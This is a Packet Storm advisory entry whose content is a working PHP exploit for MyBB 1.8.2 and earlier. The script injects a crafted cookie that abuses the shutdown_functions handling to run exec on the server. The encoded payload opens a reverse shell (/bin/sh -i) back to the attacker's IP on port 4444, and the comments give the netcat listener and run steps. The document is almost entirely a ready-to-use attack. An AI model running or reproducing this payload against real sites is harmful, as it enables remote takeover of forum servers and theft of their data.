MyBB 1.8.2 Code Execution

2015-12-15T00:00:00
ID PACKETSTORM:134833
Type packetstorm
Reporter Saeid Bostandoust
Modified 2015-12-15T00:00:00

Description

                                        
                                            `<?php  
  
// Exploit Title: MyBB <= 1.8.2 Reverse Shell Exploit  
// Date: 15/12/2015  
// Exploit Author: ssbostan  
// Vendor Homepage: http://www.mybb.com/  
// Software Link: http://resources.mybb.com/downloads/mybb_1802.zip  
// Version: <= 1.8.2  
// Tested on: MyBB 1.8.2  
  
$target="http://localhost/mybb1802/index.php";  
$yourip="ipaddress";  
$ch=curl_init();  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);  
curl_setopt($ch, CURLOPT_COOKIE, "GLOBALS=1; shutdown_functions[0][function]=exec; shutdown_functions[0][arguments][]=php%20%2Dr%20%27%24sock%3Dfsockopen%28%22$yourip%22%2C%204444%29%3Bexec%28%22%2Fbin%2Fsh%20%2Di%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27;");  
curl_setopt($ch, CURLOPT_URL, $target);  
curl_exec($ch);  
curl_close($ch);  
  
// nc -l 4444  
// php mybb-1802-core-exploit.php  
  
?>  
`